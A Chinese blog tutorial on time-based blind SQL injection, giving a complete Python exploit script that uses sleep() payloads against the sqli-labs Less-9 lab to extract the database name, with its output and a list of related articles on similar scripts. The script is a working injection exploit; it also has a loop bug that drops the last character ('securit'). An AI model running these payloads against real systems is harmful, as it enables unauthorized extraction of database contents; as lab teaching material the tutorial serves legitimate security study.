使用python编写sql时间盲注的exp

最新推荐文章于 2026-03-25 22:37:06 发布
原创 最新推荐文章于 2026-03-25 22:37:06 发布 · 2.1k 阅读 · 0 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
标签
#web安全 #python
本文介绍了时间盲注的概念和原理,通过MySQL中的sleep()函数实现延迟效果。在Web安全领域,当布尔盲注无法应用时,可以利用时间盲注来探测数据库信息。文章以Python编写的时间盲注EXP为例,展示了如何在sql-labs靶场的第9关中获取数据库名,并强调了延时时间设置的重要性。

前言:

前面学习了布尔盲注的exp,原理是根据页面的两个返回状态来确定注入的语句是否正确执行,从而得到我们想要的数据,但有时候,页面只会返回一种状态,布尔盲注就无法实行了,此时,我们就要用到另一种盲注方式:时间盲注,也叫延时注入

延时注入原理:

延时注入是利用sql语句达到延时的目的,在mysql中用的sleep()函数,

select sleep(3) 数据库延时3秒 返回信息。利用这个函数加上if函数进行判断,就可以达到延时注入,注入得出数据。

我们在exp中怎样利用呢?

我们可以获取注入代码执行之前的时间戳和注入代码执行后的时间戳,取两者的时间差,当时间差大于或等于我们注入语句中构造的延时时间(受到网络情况或其它因素的影响,一般延时的时间会大于我们规定的时间),则说明该注入语句被数据库成功执行,我们仍然要先获取到查询数据的长度,在依次判断出每一个字符,从而得到最终的数据。

有了这个思路,具体实现就很容易了:

我使用的环境是sql-labs靶场的第9关,直接用burp抓到数据包:

 exp代码:

import requests
import time


#获取数据的长度
def getstrlen(url1,headers):
    data_len=0
    i=1
    while True:
        time_start=time.time()  #获取注入语句执行前的时间戳
        payload=f"' and if(length((select database()))={i},sleep(3),0) --+" #注入语句
        url = url1 + payload
        html=expliot(url,headers)
        #比较前后时间差与规定的延时时间
        if((time.time()-time_start)>=3):
            data_len=i
            break
        else:
            i+=1
    return data_len


#获取数据
def get_data(url1,headers,data_len):
    content=''
    for i in range(1,data_len,1):
        for j in range(1,125,1):
            
            payload=f"' and if(ascii(substring((select database()),{i},1))={j},sleep(3),0) --+"
            
            url = url1 + payload
            start_time=time.time() #获取注入语句执行前的时间戳
            html=expliot(url,headers)
            # 比较前后时间差与规定的延时时间判断出每一个字符的值
            if((time.time()-start_time)>=3):
                c=chr(j) #ascii转字符
                content+=c
                print(f"判断出第{i}个字符为:{c}\r\n")
                break
    return content



#执行注入语句
def expliot(url,headers):
    response=requests.get(url,headers)
    content=response.content
    return content





def run():
    url1 = "http://192.168.43.2:9998/Less-9?id=1"
    header = '''
    Host: 192.168.43.2:9998
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Connection: close
    Upgrade-Insecure-Requests: 1
    Cache-Control: max-age=0'''
    # 去参数头尾的空格并按换行符分割
    headers = header.strip().split('\n')

    # 使用字典生成式将参数切片重组,并去掉空格,处理带协议头中的://
    headers = {x.split(':')[0].strip(): ("".join(x.split(':')[1:])).strip().replace('//', "://") for x in headers}
    #print(headers)
    data_len=getstrlen(url1,headers)
    content=get_data(url1,headers,data_len)
    print(f"判断出最终结果为{content}")


if __name__=="__main__":
    run()

执行结果(执行的时间由我们规定的延时时间决定的,因此延时时间不要设置太长,但是也不要设置太短了,可能会造成误判,根据实际情况而定):

判断出第1个字符为:s

判断出第2个字符为:e

判断出第3个字符为:c

判断出第4个字符为:u

判断出第5个字符为:r

判断出第6个字符为:i

判断出第7个字符为:t

判断出最终结果为securit

这里我获取的数据是当前数据库的名字,获取其它数据更改代码中的payload就行了

python实现sql时间盲注
箭雨镜屋
04-26 1209
一、python代码 二、使用方法 三、测试
sql注入时间盲注
m0_52484587的博客
07-11 1144
基于时间的盲注也叫延时注入。通过观察页面,既没有回显数据库内容,又没有报错信息也没有布尔类型状态,那么我们可以考虑用“绝招”--延时注入。延时注入就是根据页面的响应时间来判断是否存在注入,一点一点注入出数据库的信息。我们以第9关为例,在id=1后面加单引号或者双引号,页面不会发生任何改变,所以我们考虑绝招延时注入。1. 延时注入?如图所示,观察请求的时间线,大概在5秒以上,说明构造的sleep(5) 语句起作用,可以把这个时间线作为sql 注入的判断依据。
python脚本实现sql时间盲注
wrypot的博客
03-27 1200
python脚本实现sql盲注 sqli-labs-master pass-10 有好用脚本的大佬可以分享一波,抄袭转载请附上本文地址,违法必究。做时间盲注的只需要改一下url和payload,payload里面的闭合字符要改成正确的。将列的ascii码转化为字符,跟上面将表名的ascii码转化为字符一样。这里用sqli-labs-master第10关举例。将字段ascii码转化为字符。将表的ascii转化为字符。3、爆表名的ascii码。4、爆列的ascii码。5、爆字段ascii码。
python实现自动化延迟注入-时间盲注脚本-源代码
qq_54037445的博客
11-30 1969
在做手工的sql时间注入时,他需要一个字符一个字符的去猜,如果手动的去一个尝试,会浪费大量的时间,所以当时也就是了解他的原理后就没有试过了,这次尝试用python实现时间盲注
SQL 注入实战:时间盲注原理与 Python 脚本详解
最新发布
PyHaVolask的博客
03-25 614
本文以 sqli-labs Less-9/10 靶场为例,系统讲解时间盲注的核心原理与实战流程。在页面无回显、无状态差异的场景下,通过 IF 与 SLEEP 构造延时判断,实现数据逐步推断。文章详细演示库名、表名及字段数据的爆破方法,并解析 Python 脚本 timeblind.py 的实现逻辑,涵盖时间测量、字符枚举与攻击链拆分。同时分析时间盲注在效率与稳定性上的局限,帮助读者全面掌握该技术的应用场景与实践要点。
python sql 日期查询_SQL按时间查询方法总结
weixin_36303283的博客
02-19 2147
MYSQL:今天select * from 表名 where to_days(时间字段名) = to_days(now());昨天SELECT * FROM 表名 WHERE TO_DAYS( NOW( ) ) - TO_DAYS( 时间字段名) = 1近7天SELECT * FROM 表名 where DATE_SUB(CURDATE(), INTERVAL7DAY) <= date(时间...
帮我写一个时间盲注python脚本
weixin_35757531的博客
01-03 309
时间盲注攻击是一种数据库攻击方法,其目的是通过构造特殊的SQL查询语句来猜测数据库中的数据。在进行时间盲注攻击时,攻击者会在SQL查询中包含一个或多个条件,并通过测量查询的执行时间来判断条件是否成立。 下面是一个使用Python实现时间盲注攻击的示例代码: importtime import requests # 目标数据库地址 url = "http://database.com/query"...
[CISCN2019 华北赛区 Day2 Web1]Hack World
ruankingcsdn的博客
03-24 217
我们可以确定flag的开头一定是f,ascii,码是102,那我们是不是可以利用截取函数substr函数截取我们查询到的flag的第一个字符,将它转为ascii码,等于102,那么if函数为真,返回1,页面返回Hello, glzjin wants a girlfriend.若为假,函数返回2,页面返回Do you want to be my girlfriend?经过这些测试我们能知道输入数字是有一句字符串回显的,输入含过滤的内容会被拦截,输入非数字但不包含过滤的字符会返回false(bool)
SQL注入-时间盲注
acepanhuan的博客
02-11 3516
SQL注入盲注学习
ctf-使用python进行sql布尔盲注exp编写
qq_51796436的博客
02-28 2198
文章目录exp编写sql注入布尔盲注 exp编写 poc:验证漏洞是否存在的程序 exp:利用exp能够实现漏洞的利用价值 sql注入 本篇需要了解sql注入的原理再食用
[教程] 基于时间盲注python3脚本编写
LuckySec
04-14 3445
0x001 时间盲注简介   时间盲注就是在页面进行SQL注入并执行后,前端页面无法回显注入的信息。此时,我们可以利用sleep()函数来控制延迟页面返回结果的时间,进而判断注入的SQL语句是否正确,这个过程称之为时间盲注。但如果手工进行注入的话,过程是非常频繁且耗时的,为了提高效率,我们需要编写自动化脚本替我们去完成这些注入工作。 0x002 漏洞测试代码 以下为本次实验测试的基于时间的数字...
Python----POC到EXP(requests模块、python脚本实现布尔盲注、延时注入)
Pluto.的博客
12-27 3375
文章目录Python一、编写EXP1. requests模块- 概述- 支持HTTP的方法- requests使用HTTP方法- 参数- 对象对应的方法2. 快速开始3. 相关操作- 定制头部- 超时- GET传参- POST传参- 上传文件- 重定向- cookie4. py脚本实现布尔盲注5. py脚本实现延时注入- sys.argv[ ] Python 一、编写EXP EXP是漏洞利用工具; 基础环境Python3,核心模块requests。 1. requests模块 - 概述 requests
python 执行sql语句,时间转换遇到的坑
TLuffy的博客
02-24 707
因为python执行的sql中的DATE_FORMAT(add_time,讲sql中的DATE_FORMAT(add_time,与python的参数。
sqli-labs 第九关 基于时间盲注 python 脚本
Mirror_iu的博客
01-25 3264
# @Author:Mirror import time import requests db_len = 0 def get_schema_len (url): len = 0 left = 0 right = 20 while (left <= right): mid = left + (right - left)//2; data = "id=1' and if(length(database())>{},sleep(0.
Python脚本-时间盲注
m0_74317362的博客
09-23 1568
添加了time.sleep(0.05)
sql注入之python脚本进行时间盲注布尔盲注
Idealismi的博客
02-18 768
答:时间盲注是攻击者通过构造恶意sql语句利用sleep()等延迟函数来观察数据库响应时间差异来进行推断信息和条件判断。攻击者构造SQL语句,利用条件语句改变页面响应内容或状态码,从而判断条件真假。3、时间盲注适用于无法通过页面响应内容或状态码判断条件真假的场景。1、时间盲注通过数据库响应时间的差异来判断条件真假。布尔盲注通过页面响应内容或状态码的不同来判断条件真假。答:时间盲注布尔盲注都是SQL注入攻击的形式,用于在无法直接获取数据的情况下推断数据库信息。5、根据以上判断、可能存在boolen盲注。
使用python脚本的时间盲注完整步骤
wutiangui的博客
09-30 738
测试环境是bwapp靶场 SQL Injection - Blind - Time-Based。tips:title=,&action=search需要使用burp抓包获得。我们发现使用这种方法似乎比burp更快更高效,只是从列爆破开始需要自己选表名。
python脚本之时间盲注猜解
qq_36585338的博客
11-26 322
【代码】python脚本之时间盲注猜解。
2024年网络安全最全超硬核,SQL注入之时间盲注,原理+步骤+实战思路(4),2024年最新字节跳动网络安全面试凉凉经
2401_84239830的博客
05-07 1043
数据库在执行SQL时,会先找缓存,如果缓存存在一样的SQL,则会直接返回缓存中的查询结果,而不会查找数据库。我们截取第一个字符,穷举这95种可能性即可,为了方便猜解,我们将字符转换为ASCLL码再进行判断(字符对应的ASCLL为 32~126)。同样的payload,如果第一次响应时间很长,但第二次响应时间很短,就说明是受到了网络波动的影响。条件表达式结果为 False 时,会执行第三个参数位置的代码,即 3,自定义的占位符,无实际意义,页面正常响应。如果你能答对70%,找一个安全工作,问题不大。
时间盲注(ctfhub)
2401_82985722的博客
03-29 3012
布尔盲注直接使用length进行筛选:按照length从高到低排序 前面四个即为结果,按照payload1的顺序进行排序得到数据库名sqli。(已经知道长度为4,可以直接设置为4,不知道时 设置比需要爆破字符的长度长。(5)点击开始攻击得到结果,sleep(5)要筛选出响应时间大于5s的数据包。condition为条件,条件为真时返回true,条件为假时返回false。再进行筛选,响应时间最大的四个就是执行成功的——sqli。# -D 指定库,-T指定表,-C 指定列(字段)(爆破字段为26个英文字母)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值